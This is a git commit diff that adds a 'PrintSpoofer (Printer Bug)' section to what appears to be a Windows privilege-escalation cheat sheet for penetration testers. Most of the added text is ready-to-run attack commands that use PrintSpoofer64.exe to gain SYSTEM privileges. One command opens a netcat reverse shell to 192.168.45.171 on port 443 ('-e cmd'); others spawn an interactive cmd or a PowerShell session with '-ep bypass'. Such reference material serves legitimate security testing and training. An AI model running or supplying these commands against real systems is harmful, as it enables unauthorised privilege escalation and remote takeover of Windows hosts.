Merge pull request #696 from jenaye/PrintSpoofer

swisskyrepo · web-flow · commit bb71d4ad141b · 2023-11-17T12:11:48.000+01:00
[Add] - Priv esc windows (PrintSpoofer)
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
@@ -49,6 +49,7 @@
     * [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
     * [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
     * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
+    * [PrintSpoofer (Printer Bug)](#PrintSpoofer-Printer-Bug)))
 * [EoP - Privileged File Write](#eop---privileged-file-write)
     * [DiagHub](#diaghub)
     * [UsoDLLLoader](#usodllloader)
@@ -1264,6 +1265,21 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juic
 ```
 
 
+###  PrintSpoofer (Printer Bug)
+
+> this work if SeImpersonatePrivilege is enabled
+
+* Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
+
+```powershell
+# run nc -lnvp 443 then :
+.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"
+# without listener
+.\PrintSpoofer64.exe -i -c cmd
+# Via RPD
+.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass"
+```
+
 ## EoP - Privileged File Write
 
 ### DiagHub
